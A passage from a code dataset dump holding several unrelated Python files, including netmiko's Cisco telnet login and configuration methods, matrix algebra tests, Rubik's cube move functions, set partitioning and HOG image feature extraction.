exit_command: str = \"disable\") -> str:\n \"\"\"Exits enable (privileged exec) mode.\"\"\"\n return super().exit_enable_mode(exit_command=exit_command)\n\n def check_config_mode(\n self, check_string: str = \")#\", pattern: str = \"\", force_regex: bool = False\n ) -> bool:\n \"\"\"Checks if the device is in configuration mode or not.\"\"\"\n return super().check_config_mode(\n check_string=check_string, pattern=pattern, force_regex=force_regex\n )\n\n def config_mode(\n self,\n config_command: str = \"configure terminal\",\n pattern: str = \"\",\n re_flags: int = 0,\n ) -> str:\n return super().config_mode(\n config_command=config_command, pattern=pattern, re_flags=re_flags\n )\n\n def exit_config_mode(self, exit_config: str = \"end\", pattern: str = r\"#.*\") -> str:\n \"\"\"Exit from configuration mode.\"\"\"\n return super().exit_config_mode(exit_config=exit_config, pattern=pattern)\n\n def serial_login(\n self,\n pri_prompt_terminator: str = r\"\\#\\s*$\",\n alt_prompt_terminator: str = r\">\\s*$\",\n username_pattern: str = r\"(?:user:|username|login)\",\n pwd_pattern: str = r\"assword\",\n delay_factor: float = 1.0,\n max_loops: int = 20,\n ) -> str:\n self.write_channel(self.TELNET_RETURN)\n output = self.read_channel()\n if re.search(pri_prompt_terminator, output, flags=re.M) or re.search(\n alt_prompt_terminator, output, flags=re.M\n ):\n return output\n else:\n return self.telnet_login(\n pri_prompt_terminator,\n alt_prompt_terminator,\n username_pattern,\n pwd_pattern,\n delay_factor,\n max_loops,\n )\n\n def telnet_login(\n self,\n pri_prompt_terminator: str = r\"\\#\\s*$\",\n alt_prompt_terminator: str = r\">\\s*$\",\n username_pattern: str = r\"(?:user:|username|login|user name)\",\n pwd_pattern: str = r\"assword\",\n delay_factor: float = 1.0,\n max_loops: int = 20,\n ) -> str:\n \"\"\"Telnet login. Can be username/password or just password.\"\"\"\n delay_factor = self.select_delay_factor(delay_factor)\n\n if delay_factor < 1:\n if not self._legacy_mode and self.fast_cli:\n delay_factor = 1\n\n time.sleep(1 * delay_factor)\n\n output = \"\"\n return_msg = \"\"\n outer_loops = 3\n inner_loops = int(max_loops / outer_loops)\n i = 1\n for _ in range(outer_loops):\n while i <= inner_loops:\n try:\n output = self.read_channel()\n return_msg += output\n\n # Search for username pattern / send username\n if re.search(username_pattern, output, flags=re.I):\n # Sometimes username/password must be terminated with \"\\r\" and not \"\\r\\n\"\n self.write_channel(self.username + \"\\r\")\n time.sleep(1 * delay_factor)\n output = self.read_channel()\n return_msg += output\n\n # Search for password pattern / send password\n if re.search(pwd_pattern, output, flags=re.I):\n # Sometimes username/password must be terminated with \"\\r\" and not \"\\r\\n\"\n assert isinstance(self.password, str)\n self.write_channel(self.password + \"\\r\")\n time.sleep(0.5 * delay_factor)\n output = self.read_channel()\n return_msg += output\n if re.search(\n pri_prompt_terminator, output, flags=re.M\n ) or re.search(alt_prompt_terminator, output, flags=re.M):\n return return_msg\n\n # Support direct telnet through terminal server\n if re.search(\n r\"initial configuration dialog\\? \\[yes/no\\]: \", output\n ):\n self.write_channel(\"no\" + self.TELNET_RETURN)\n time.sleep(0.5 * delay_factor)\n count = 0\n while count < 15:\n output = self.read_channel()\n return_msg += output\n if re.search(r\"ress RETURN to get started\", output):\n output = \"\"\n break\n time.sleep(2 * delay_factor)\n count += 1\n\n # Check for device with no password configured\n if re.search(r\"assword required, but none set\", output):\n assert self.remote_conn is not None\n self.remote_conn.close()\n msg = (\n \"Login failed - Password required, but none set: {}\".format(\n self.host\n )\n )\n raise NetmikoAuthenticationException(msg)\n\n # Check if proper data received\n if re.search(\n pri_prompt_terminator, output, flags=re.M\n ) or re.search(alt_prompt_terminator, output, flags=re.M):\n return return_msg\n\n i += 1\n\n except EOFError:\n assert self.remote_conn is not None\n self.remote_conn.close()\n msg = f\"Login failed: {self.host}\"\n raise NetmikoAuthenticationException(msg)\n\n # Try sending an to restart the login process\n self.write_channel(self.TELNET_RETURN)\n time.sleep(0.5 * delay_factor)\n i = 1\n\n # Last try to see if we already logged in\n self.write_channel(self.TELNET_RETURN)\n time.sleep(0.5 * delay_factor)\n output = self.read_channel()\n return_msg += output\n if re.search(pri_prompt_terminator, output, flags=re.M) or re.search(\n alt_prompt_terminator, output, flags=re.M\n ):\n return return_msg\n\n assert self.remote_conn is not None\n self.remote_conn.close()\n msg = f\"Login failed: {self.host}\"\n raise NetmikoAuthenticationException(msg)\n\n def cleanup(self, command: str = \"exit\") -> None:\n \"\"\"Gracefully exit the SSH session.\"\"\"\n try:\n if self.check_config_mode():\n self.exit_config_mode()\n except Exception:\n pass\n # Always try to send final 'exit' (command)\n if self.session_log:\n self.session_log.fin = True\n self.write_channel(command + self.RETURN)\n\n def _autodetect_fs(\n self, cmd: str = \"dir\", pattern: str = r\"Directory of (.*)/\"\n ) -> str:\n \"\"\"Autodetect the file system on the remote device. Used by SCP operations.\"\"\"\n if not self.check_enable_mode():\n raise ValueError(\"Must be in enable mode to auto-detect the file-system.\")\n output = self._send_command_str(cmd)\n match = re.search(pattern, output)\n if match:\n file_system = match.group(1)\n # Test file_system\n cmd = f\"dir {file_system}\"\n output = self._send_command_str(cmd)\n if \"% Invalid\" in output or \"%Error:\" in output:\n raise ValueError(\n \"An error occurred in dynamically determining remote file \"\n \"system: {} {}\".format(cmd, output)\n )\n else:\n return file_system\n\n raise ValueError(\n \"An error occurred in dynamically determining remote file \"\n \"system: {} {}\".format(cmd, output)\n )\n\n def save_config(\n self,\n cmd: str = \"copy running-config startup-config\",\n confirm: bool = False,\n confirm_response: str = \"\",\n ) -> str:\n \"\"\"Saves Config.\"\"\"\n self.enable()\n if confirm:\n output = self._send_command_timing_str(\n command_string=cmd, strip_prompt=False, strip_command=False\n )\n if confirm_response:\n output += self._send_command_timing_str(\n confirm_response, strip_prompt=False, strip_command=False\n )\n else:\n # Send enter by default\n output += self._send_command_timing_str(\n self.RETURN, strip_prompt=False, strip_command=False\n )\n else:\n # Some devices are slow so match on trailing-prompt if you can\n output = self._send_command_str(\n command_string=cmd,\n strip_prompt=False,\n strip_command=False,\n read_timeout=100.0,\n )\n return output\n\n\nclass CiscoSSHConnection(CiscoBaseConnection):\n pass\n\n\nclass CiscoFileTransfer(BaseFileTransfer):\n pass\n","repo_name":"ktbyers/netmiko","sub_path":"netmiko/cisco_base_connection.py","file_name":"cisco_base_connection.py","file_ext":"py","file_size_in_byte":10259,"program_lang":"python","lang":"en","doc_type":"code","stars":3278,"dataset":"github-code","pt":"21"} +{"seq_id":"22611032206","text":"'''\nCreated on 28 Jul 2017\n\n@author: julianporter\n'''\nimport unittest\nfrom .baseTest import TestFramework\nfrom .types import equalMatrices, equalVectors, vectorDiff, matrixDiff\nimport numpy as np\nfrom OSGridConverter.cartesian import ExactTransform, Matrix\n\n\n\n\nclass TestVectorEquality(TestFramework):\n \n testName='vector creation'\n \n def action(self):\n np, v=self.generator.randomVectorPair()\n if equalVectors(np, v): return 1\n else: return 0\n\nclass TestVectorNegation(TestFramework):\n \n testName='vector negation'\n \n def action(self):\n\n np, v=self.generator.randomVectorPair()\n if equalVectors(-np, -v): return 1\n else: return 0\n \nclass TestDotProduct(TestFramework):\n \n testName='dot product'\n \n def action(self):\n np1, v1=self.generator.randomVectorPair()\n np2, v2=self.generator.randomVectorPair()\n if np.dot(np1,np2) == v1 | v2 : return 1\n else: return 0\n \nclass TestVectorSum(TestFramework):\n \n testName='vector sum'\n \n def action(self):\n np1, v1=self.generator.randomVectorPair()\n np2, v2=self.generator.randomVectorPair()\n if equalVectors(np1+np2,v1+v2) : return 1\n else: return 0\n \nclass TestMatrixSum(TestFramework):\n \n testName='matrix sum'\n \n def action(self):\n np1, v1=self.generator.randomMatrixPair()\n np2, v2=self.generator.randomMatrixPair()\n if equalMatrices(np1+np2,v1+v2) : return 1\n else: return 0\n \nclass TestMatrixVectorProduct(TestFramework):\n \n testName='matrix vector product'\n \n def action(self):\n np1, v1=self.generator.randomMatrixPair()\n np2, v2=self.generator.randomVectorPair()\n pr1 = np1@np2\n pr2 = v1@v2\n e=vectorDiff(pr1, pr2)\n return self.push(e)\n \nclass TestMatrixMatrixProduct(TestFramework):\n \n testName='matrix matrix product'\n \n def action(self):\n np1, v1=self.generator.randomMatrixPair()\n np2, v2=self.generator.randomMatrixPair()\n pr1 = np.transpose(np1@np2)\n pr2 = v1@v2\n e=matrixDiff(pr1, pr2)\n return self.push(e)\n \nclass TestHelmertInversion(unittest.TestCase):\n \n testName='Helmert matrix inversion'\n \n def setUp(self):\n super(TestHelmertInversion,self).setUp()\n self.i3=Matrix.identity(n=3)\n \n def action(self):\n t=self.generator.randomList()\n r=self.generator.randomList()\n s=self.generator.randomScalar()\n h=ExactTransform(t,r,s).mx\n i=h.inverse()\n pr1 = h@i\n e= matrixDiff(pr1, self.i3)\n return self.push(e)\n \n\nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.testName']\n unittest.main()","repo_name":"jdstmporter/OSGridConverter","sub_path":"python/test/test_algebra.py","file_name":"test_algebra.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"16408701808","text":"impassable_squares = [\n 'vanilla:border',\n 'vanilla:border1',\n 'vanilla:border2',\n 'vanilla:border2',\n 'vanilla:border3',\n 'vanilla:border4',\n 'vanilla:border5',\n 'vanilla:border6',\n 'vanilla:border7',\n 'vanilla:border8',\n 'vanilla:border9',\n\n 'vanilla:wall',\n 'vanilla:wall1',\n 'vanilla:wall2',\n 'vanilla:wall3',\n 'vanilla:wall4',\n 'vanilla:wall5',\n 'vanilla:wall6',\n 'vanilla:wall7',\n 'vanilla:wall8',\n 'vanilla:wall9',\n\n ]\nimjumpable_squares = impassable_squares[:]\n\n\ntmp_texture_pack_directory = './tmp_texture_pack'\ntexture_error_path = './texture_packs/vanilla/squares/vanilla:texture_error.png'\n\n\nfrom piece import Piece\nfrom piece_packs.vanilla.vanilla_wazir import VanillaWazir\nfrom piece_packs.vanilla.vanilla_chesspawn import VanillaChessPawn\nfrom piece_packs.vanilla.vanilla_rook import VanillaRook\nfrom piece_packs.vanilla.vanilla_bishop import VanillaBishop\nfrom piece_packs.vanilla.vanilla_queen import VanillaQueen\nfrom piece_packs.vanilla.vanilla_knight import VanillaKnight\nfrom piece_packs.vanilla.vanilla_king import VanillaKing\nglobal_piece_dict = {\n 'vanilla:wazir': VanillaWazir,\n 'vanilla:chesspawn': VanillaChessPawn,\n 'vanilla:rook': VanillaRook,\n 'vanilla:bishop': VanillaBishop,\n 'vanilla:queen': VanillaQueen,\n 'vanilla:knight': VanillaKnight,\n 'vanilla:king': VanillaKing,\n }\n\nfrom player_packs.vanilla.vanilla_classic_ai import VanillaClassicAI\nfrom player_packs.vanilla.vanilla_player import VanillaPlayer\nglobal_player_dict = {\n 'vanilla:classic_ai': VanillaClassicAI,\n 'vanilla:player': VanillaPlayer\n }\n\nVANILLA_PLAYER = 'vanilla:player'\n\nplayers_dict = dict()\nplayers_list = list(players_dict)\ncurrent_player_id = -1\ncurrent_player_color = 0\ncurrent_player_class = 0\n","repo_name":"zubakker/Chessmonster","sub_path":"vanilla_settings.py","file_name":"vanilla_settings.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74754133171","text":"from ressources import *\r\nfrom graphic_interpreter import*\r\n\r\n\r\n\r\ndef right_prime(arretes, coins):\r\n A = coins[0]\r\n A[0], A[1], A[2] = A[0], A[2], A[1]\r\n coins[0] = A\r\n A = coins[1]\r\n A[0], A[1], A[2] = A[0], A[2], A[1]\r\n coins[1] = A\r\n A = coins[2]\r\n A[0], A[1], A[2] = A[0], A[2], A[1]\r\n coins[2] = A\r\n A = coins[3]\r\n A[0], A[1], A[2] = A[0], A[2], A[1]\r\n coins[3] = A\r\n coins[0],coins[1], coins[2], coins[3] = coins[1], coins[3], coins[0], coins[2]\r\n arretes[0], arretes[1], arretes[2], arretes[3] = arretes[3], arretes[2], arretes[0], arretes[1]\r\n return (arretes,coins)\r\n\r\n\r\ndef right(arretes, coins):\r\n for i in range(0,3):\r\n arretes, coins = right_prime(arretes, coins)\r\n return arretes, coins\r\n\r\n\r\ndef left_prime(arretes , coins):\r\n coins_cinq = coins[4]\r\n coins_cinq[0], coins_cinq[1], coins_cinq[2] = coins_cinq[0], coins_cinq[2], coins_cinq[1]\r\n coins[4] = coins_cinq\r\n coins_six = coins[5]\r\n coins_six[0], coins_six[1], coins_six[2] = coins_six[0], coins_six[2], coins_six[1]\r\n coins[5]=coins_six\r\n coins_sept = coins[6]\r\n coins_sept[0], coins_sept[1], coins_sept[2] = coins_sept[0], coins_sept[2], coins_sept[1]\r\n coins[6] = coins_sept\r\n coins_huit = coins[7]\r\n coins_huit[0], coins_huit[1], coins_huit[2] = coins_huit[0], coins_huit[2], coins_huit[1]\r\n coins[4], coins[5], coins[6], coins[7] = coins[6], coins[4], coins[7], coins[5]\r\n arretes[4], arretes[5], arretes[6], arretes[7] = arretes[6], arretes[7], arretes[5], arretes[4]\r\n return (arretes,coins)\r\n\r\n\r\ndef left(arretes, coins):\r\n for i in range(0,3):\r\n arretes, coins = left_prime(arretes, coins)\r\n return(arretes , coins)\r\n\r\n\r\ndef up_prime(arretes, coins):\r\n liste_coins = [0,1,4,5]\r\n liste_arretes = [0,4,8,9]\r\n #coins\r\n for i in liste_coins:\r\n coins_1_2_5_6 = coins[i]\r\n coins_1_2_5_6[0], coins_1_2_5_6[1], coins_1_2_5_6[2] = coins_1_2_5_6[2], coins_1_2_5_6[1], coins_1_2_5_6[0]\r\n coins[i] = coins_1_2_5_6\r\n coins[0], coins[1], coins[4], coins[5] = coins[4], coins[0], coins[5], coins[1]\r\n for j in liste_arretes:\r\n arretes_1_5_9_10 = arretes[j]\r\n arretes_1_5_9_10[0], arretes_1_5_9_10[1] = arretes_1_5_9_10[1], arretes_1_5_9_10[0]\r\n arretes[j] = arretes_1_5_9_10\r\n arretes[0], arretes[4], arretes[8], arretes[9] = arretes[8], arretes[9], arretes[4], arretes[0]\r\n return (arretes,coins)\r\n\r\n\r\ndef up(arretes, coins):\r\n for i in range(0,3):\r\n arretes, coins = up_prime(arretes, coins)\r\n return arretes, coins\r\n\r\n\r\ndef down(arretes,coins):\r\n liste_coins=[2,3,6,7]\r\n liste_arretes=[1,5,10,11]\r\n for i in liste_coins:\r\n coins_trois_quatre_sept_huit = coins[i]\r\n coins_trois_quatre_sept_huit[0], coins_trois_quatre_sept_huit[1], coins_trois_quatre_sept_huit[2] = coins_trois_quatre_sept_huit[2], coins_trois_quatre_sept_huit[1], coins_trois_quatre_sept_huit[0]\r\n coins[i] = coins_trois_quatre_sept_huit\r\n coins[2], coins[3], coins[6], coins[7] = coins[6], coins[2], coins[7], coins[3]\r\n for j in liste_arretes:\r\n arrete_trois_quatre_onze_douze = arretes[j]\r\n arrete_trois_quatre_onze_douze[0], arrete_trois_quatre_onze_douze[1] = arrete_trois_quatre_onze_douze[1], arrete_trois_quatre_onze_douze[0]\r\n arretes[j] = arrete_trois_quatre_onze_douze\r\n arretes[1], arretes[5], arretes[10], arretes[11] = arretes[10], arretes[11], arretes[5], arretes[1]\r\n return (arretes,coins)\r\n\r\n\r\ndef down_prime(arretes, coins):\r\n for i in range(0,3):\r\n arretes, coins = down(arretes, coins)\r\n return arretes, coins\r\n\r\n\r\ndef front_prime(arretes,coins):\r\n liste_coins=[0,2,4,6]\r\n for i in liste_coins:\r\n coins_1_3_5_7 = coins[i]\r\n coins_1_3_5_7[0], coins_1_3_5_7[1], coins_1_3_5_7[2] = coins_1_3_5_7[1], coins_1_3_5_7[0], coins_1_3_5_7[2]\r\n coins[i] = coins_1_3_5_7\r\n coins[0], coins[2], coins[4], coins[6] = coins[2], coins[6], coins[0], coins[4]\r\n arretes[2], arretes[6], arretes[8], arretes[10] = arretes[10], arretes[8], arretes[2], arretes[6]\r\n return (arretes,coins)\r\n\r\n\r\ndef front(arretes, coins):\r\n for i in range(0,3):\r\n arretes, coins = front_prime(arretes, coins)\r\n return arretes, coins\r\n\r\n\r\ndef back_prime(arretes,coins):\r\n liste_coins = [1,3,5,7]\r\n liste_arretes = [3,7,9,11]\r\n for i in liste_coins:\r\n coins_2_4_6_8 = coins[i]\r\n coins_2_4_6_8[0], coins_2_4_6_8[1], coins_2_4_6_8[2] = coins_2_4_6_8[1], coins_2_4_6_8[0], coins_2_4_6_8[2]\r\n coins[i] = coins_2_4_6_8\r\n coins[1], coins[3], coins[5], coins[7] = coins[5], coins[1], coins[7], coins[3]\r\n arretes[3], arretes[7], arretes[9], arretes[11] = arretes[9], arretes[11], arretes[7], arretes[3]\r\n return (arretes,coins)\r\n\r\n\r\ndef back(arretes, coins):\r\n for i in range(0,3):\r\n arretes, coins = back_prime(arretes, coins)\r\n return arretes, coins\r\n\r\n\r\ndef middle(arretes,centres):\r\n liste_centres = [2,3,4,5]\r\n liste_arretes = [8,9,10,11]\r\n centres[2], centres[3], centres[4], centres[5] = centres[5], centres[4], centres[2], centres[3]\r\n for i in liste_arretes:\r\n arretes9_10_11_12 = arretes[i]\r\n arretes9_10_11_12[0] , arretes9_10_11_12[1] = arretes9_10_11_12[1], arretes9_10_11_12[0]\r\n arretes[i] = arretes9_10_11_12\r\n arretes[8] , arretes[9] , arretes[10] , arretes[11] = arretes[9] , arretes[11] , arretes[8] , arretes[10]\r\n return(arretes,centres)\r\n\r\n\r\ndef middle_prime(arretes,centres):\r\n for i in range(0,3):\r\n arretes,centres = middle(arretes,centres)\r\n return arretes, centres\r\n\r\n\r\ndef equator(arretes,centres):\r\n liste_arretes = [2,3,6,7]\r\n centres[0], centres[1], centres[4], centres[5] = centres[4], centres[5], centres[1], centres[0]\r\n for i in liste_arretes:\r\n arrete3_4_7_8 = arretes[i]\r\n arrete3_4_7_8[0], arrete3_4_7_8[1] = arrete3_4_7_8[1], arrete3_4_7_8[0]\r\n arretes[i] = arrete3_4_7_8\r\n arretes[2], arretes[3], arretes[6], arretes[7] = arretes[6], arretes[2], arretes[7], arretes[3]\r\n return(arretes, centres )\r\n\r\n\r\ndef equator_prime(arretes , centres):\r\n for i in range(0,3):\r\n arretes,centres = equator(arretes,centres)\r\n return arretes, centres\r\n\r\nJ_sym = [\"'R\",\"U\",\"'L\",\"2U\",\"R\",\"'U\",\"'R\",\"2U\",\"R\",\"L\",\"'U\"]\r\nJ_sym_mod = ['R','U',\"'L\",\"2U\",\"R\",\"'U\",\"'R\",\"2U\",\"L\",\"R\",\"'U\",\"2R\"]\r\nPLL_J = [\"R\",\"U\", \"'R\",\"'F\", \"R\", \"U\", \"'R\", \"'U\", \"'R\", \"F\", \"2R\", \"'U\", \"'R\", \"'U\"]\r\nPLL_Y = ['F', 'R',\"'U\",\"'R\",\"'U\",'R','U',\"'R\",\"'F\",'R','U',\"'R\",\"'U\",\"'R\",'F','R',\"'F\"]\r\nPLL_T = ['R', 'U', \"'R\", \"'U\", \"'R\", \"F\", \"2R\", \"'U\", \"'R\", \"'U\", \"R\", \"U\", \"'R\", \"'F\"]","repo_name":"MaelSa/RubiksSolver","sub_path":"fonctions_deplacement.py","file_name":"fonctions_deplacement.py","file_ext":"py","file_size_in_byte":6648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13190775765","text":"def solution(line):\n point_x = []\n point_y = []\n n = len(line)\n\n for i in range(n - 1):\n A = line[i][0]\n B = line[i][1]\n E = line[i][2]\n\n for j in range(i + 1, n):\n C = line[j][0]\n D = line[j][1]\n F = line[j][2]\n\n if ((A * D) - (B * C)) == 0:\n continue\n\n x = ((B * F) - (E * D)) / ((A * D) - (B * C))\n y = ((E * C) - (A * F)) / ((A * D) - (B * C))\n\n if x > int(x) or y > int(y) or x < int(x) or y < int(y):\n continue\n\n point_x.append(int(x))\n point_y.append(int(y))\n\n max_x = max(point_x)\n min_x = min(point_x)\n max_y = max(point_y)\n min_y = min(point_y)\n\n width = abs(max_x - min_x)\n height = abs(max_y - min_y)\n\n star = [\".\" * (width + 1) for _ in range(height + 1)]\n\n for i in range(len(point_x)):\n point_x[i] += abs(min_x)\n point_y[i] -= abs(max_y)\n\n s = star[abs(point_y[i])]\n star[abs(point_y[i])] = s[:point_x[i]] + \"*\" + s[point_x[i] + 1:]\n\n return star\n\n\nsolution([[2, -1, 4], [-2, -1, 4], [0, -1, 1], [5, -8, -12], [5, 8, 12]])","repo_name":"Eui9179/algorithm-study","sub_path":"programmers/python/book/array/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73574061813","text":"# From codereview.stackexchange.com\n#[1, 2, 3, 4]\n# [{}, {}] [a, b\n\n# [1,2,3] [[1]] [[1] [2]] [[1, 2]]\n#[[2, 3]] [[3], [2]]\n\n\ndef partition(collection):\n if len(collection) == 1:\n yield [collection]\n return\n\n first = collection[0]\n for smaller in partition(collection[1:]):\n # insert `first` in each of the subpartition's subsets\n for n, subset in enumerate(smaller):\n yield smaller[:n] + [[first] + subset] + smaller[n + 1:]\n # put `first` in its own subset\n yield [[first]] + smaller\n\n\ndef partitions(set_):\n if not set_:\n yield []\n return\n for i in range(2**len(set_) // 2):\n parts = [set(), set()]\n for item in set_:\n parts[i & 1].add(item)\n i >>= 1\n for b in partitions(parts[1]):\n yield [parts[0]] + b\n\n\n# This is a helper function that will fetch all of the available\n# partitions for you to use for your brute force algorithm.\ndef get_partitions(set_):\n for partition in partitions(set_):\n yield [list(elt) for elt in partition]\n\n# Uncomment the following code and run this file\n# to see what get_partitions does if you want to visualize it:\n\n\n# for item in (get_partitions(['a', 'b', 'c', 'd'])):\n# print(item, len(item))\n\n# for i in partition(['a', 'b', 'c', 'd']):\n# print(i, len(i))\n","repo_name":"Axolot1/Introduction-to-Computational-Thinking-and-Data-Science","sub_path":"Unit1_Greedy_DP_Graph/pset1/ps1_partition.py","file_name":"ps1_partition.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27320904612","text":"import hydra\nfrom omegaconf import DictConfig\n\nfrom src.preprocessing.preencode_libri import LibriPreprocessor\nfrom src import utils\n\nlog = utils.get_logger(__name__)\n\n\ndef preprocess(config: DictConfig) -> None:\n \n # 0. instantiate preprocessor\n log.info(f\"Instantiating preprocessor <{config.preprocessing._target_}>\")\n preprocessor: LibriPreprocessor = hydra.utils.instantiate(config.preprocessing)\n\n # 1. Load data\n log.info(f\"Loading dataset <{config.preprocessing.dataset_name}/{config.dataset_split}>\")\n preprocessor.load_dataset(config.dataset_split)\n \n # 2. Speech file to array\n log.info(\"Copying speech array and sampling rate.\")\n preprocessor.speech_file_to_array()\n \n # 3. Filter audio samples longer than max_audio_length\n log.info(f\"Filtering audio samples longer than {config.max_audio_length} seconds.\")\n preprocessor.filter_long_audio(config.max_audio_length)\n \n # 4. extract features from audio\n log.info(f\"Extracting features from audio and tokenizing text.\")\n preprocessor.extract_features_and_tokenize()\n \n # 5. encode text\n log.info(f\"Encoding text with BERT: <{config.preprocessing.text_model_name}>.\")\n preprocessor.encode_text()\n \n # 6. save data\n save_loc_dict = {\n 'workdir': config.path_local,\n 'HD': config.path_hd,\n 'drive': config.path_colab,\n }\n log.info(f\"Saving data to <{save_loc_dict[config.save_in]}{config.save_path}>.\")\n preprocessor.save_dataset(save_loc_dict[config.save_in], config.save_path)\n \n ","repo_name":"marcomoldovan/cross-modal-speech-segment-retrieval","sub_path":"src/preprocessing_pipeline.py","file_name":"preprocessing_pipeline.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3123523573","text":"import numpy as np\nfrom scipy import sqrt, pi, arctan2, cos, sin\nfrom scipy.ndimage import uniform_filter\n\n\ndef hog(image, orientations=9, pixels_per_cell=(8, 8),\n cells_per_block=(3, 3), visualise=False, normalize=False):\n \"\"\"Extract Histogram of Oriented Gradients (HOG) for a given image.\n\n Compute a Histogram of Oriented Gradients (HOG) by\n\n 1. (optional) global image normalization\n 2. computing the gradient image in x and y\n 3. computing gradient histograms\n 4. normalizing across blocks\n 5. flattening into a feature vector\n\n Parameters\n ----------\n image : (M, N) ndarray\n Input image (greyscale).\n orientations : int\n Number of orientation bins.\n pixels_per_cell : 2 tuple (int, int)\n Size (in pixels) of a cell.\n cells_per_block : 2 tuple (int,int)\n Number of cells in each block.\n visualise : bool, optional\n Also return an image of the HOG.\n normalize : bool, optional\n Apply power law compression to normalize the image before\n processing.\n\n Returns\n -------\n newarr : ndarray\n HOG for the image as a 1D (flattened) array.\n hog_image : ndarray (if visualise=True)\n A visualisation of the HOG image.\n\n References\n ----------\n * http://en.wikipedia.org/wiki/Histogram_of_oriented_gradients\n\n * Dalal, N and Triggs, B, Histograms of Oriented Gradients for\n Human Detection, IEEE Computer Society Conference on Computer\n Vision and Pattern Recognition 2005 San Diego, CA, USA\n\n \"\"\"\n image = np.atleast_2d(image)\n\n \"\"\"\n The first stage applies an optional global image normalization\n equalization that is designed to reduce the influence of illumination\n effects. In practice we use gamma (power law) compression, either\n computing the square root or the log of each color channel.\n Image texture strength is typically proportional to the local surface\n illumination so this compression helps to reduce the effects of local\n shadowing and illumination variations.\n \"\"\"\n\n if image.ndim > 3:\n raise ValueError(\"Currently only supports grey-level images\")\n\n if normalize:\n image = sqrt(image)\n\n \"\"\"\n The second stage computes first order image gradients. These capture\n contour, silhouette and some texture information, while providing\n further resistance to illumination variations. The locally dominant\n color channel is used, which provides color invariance to a large\n extent. Variant methods may also include second order image derivatives,\n which act as primitive bar detectors - a useful feature for capturing,\n e.g. bar like structures in bicycles and limbs in humans.\n \"\"\"\n\n gx = np.zeros(image.shape)\n gy = np.zeros(image.shape)\n gx[:, :-1] = np.diff(image, n=1, axis=1)\n gy[:-1, :] = np.diff(image, n=1, axis=0)\n\n \"\"\"\n The third stage aims to produce an encoding that is sensitive to\n local image content while remaining resistant to small changes in\n pose or appearance. The adopted method pools gradient orientation\n information locally in the same way as the SIFT [Lowe 2004]\n feature. The image window is divided into small spatial regions,\n called \"cells\". For each cell we accumulate a local 1-D histogram\n of gradient or edge orientations over all the pixels in the\n cell. This combined cell-level 1-D histogram forms the basic\n \"orientation histogram\" representation. Each orientation histogram\n divides the gradient angle range into a fixed number of\n predetermined bins. The gradient magnitudes of the pixels in the\n cell are used to vote into the orientation histogram.\n \"\"\"\n\n magnitude = sqrt(gx ** 2 + gy ** 2)\n orientation = arctan2(gy, (gx + 1e-15)) * (180 / pi) + 90\n\n sy, sx = image.shape\n cx, cy = pixels_per_cell\n bx, by = cells_per_block\n\n n_cellsx = int(np.floor(sx // cx)) # number of cells in x\n n_cellsy = int(np.floor(sy // cy)) # number of cells in y\n\n # compute orientations integral images\n orientation_histogram = np.zeros((n_cellsy, n_cellsx, orientations))\n for i in range(orientations):\n # create new integral image for this orientation\n # isolate orientations in this range\n\n temp_ori = np.where(orientation < 180 / orientations * (i + 1),\n orientation, 0)\n temp_ori = np.where(orientation >= 180 / orientations * i,\n temp_ori, 0)\n # select magnitudes for those orientations\n cond2 = temp_ori > 0\n temp_mag = np.where(cond2, magnitude, 0)\n\n orientation_histogram[:, :, i] = \\\n uniform_filter(temp_mag, size=(cy, cx))[cy / 2::cy, cx / 2::cx]\n\n # now for each cell, compute the histogram\n # orientation_histogram = np.zeros((n_cellsx, n_cellsy, orientations))\n\n radius = min(cx, cy) // 2 - 1\n hog_image = None\n if visualise:\n hog_image = np.zeros((sy, sx), dtype=float)\n\n if visualise:\n from skimage import draw\n\n for x in range(n_cellsx):\n for y in range(n_cellsy):\n for o in range(orientations):\n centre = tuple([y * cy + cy // 2, x * cx + cx // 2])\n dx = radius * cos(float(o) / orientations * np.pi)\n dy = radius * sin(float(o) / orientations * np.pi)\n rr, cc = draw.bresenham(centre[0] - dx, centre[1] - dy,\n centre[0] + dx, centre[1] + dy)\n hog_image[rr, cc] += orientation_histogram[y, x, o]\n\n \"\"\"\n The fourth stage computes normalization, which takes local groups of\n cells and contrast normalizes their overall responses before passing\n to next stage. Normalisation introduces better invariance to illumination,\n shadowing, and edge contrast. It is performed by accumulating a measure\n of local histogram \"energy\" over local groups of cells that we call\n \"blocks\". The result is used to normalize each cell in the block.\n Typically each individual cell is shared between several blocks, but\n its normalizations are block dependent and thus different. The cell\n thus appears several times in the final output vector with different\n normalizations. This may seem redundant but it improves the performance.\n We refer to the normalized block descriptors as Histogram of Oriented\n Gradient (HOG) descriptors.\n \"\"\"\n\n n_blocksx = (n_cellsx - bx) + 1\n n_blocksy = (n_cellsy - by) + 1\n normalized_blocks = np.zeros((n_blocksy, n_blocksx,\n by, bx, orientations))\n\n for x in range(n_blocksx):\n for y in range(n_blocksy):\n block = orientation_histogram[y:y + by, x:x + bx, :]\n eps = 1e-5\n normalized_blocks[y, x, :] = block / sqrt(block.sum() ** 2 + eps)\n\n \"\"\"\n The final step collects the HOG descriptors from all blocks of a dense\n overlapping grid of blocks covering the detection window into a combined\n feature vector for use in the window classifier.\n \"\"\"\n\n if visualise:\n return normalized_blocks.ravel(), hog_image\n else:\n return normalized_blocks.ravel()\n","repo_name":"Samsung/veles","sub_path":"veles/external/hog.py","file_name":"hog.py","file_ext":"py","file_size_in_byte":7228,"program_lang":"python","lang":"en","doc_type":"code","stars":903,"dataset":"github-code","pt":"21"} +{"seq_id":"23667260700","text":"import os\nimport mesa\n\nfrom ..model import RoomModel\nfrom ..file_loader import FileLoader\n\n\nfilename = \"./maps/topology/10V.txt\"\nfilename = 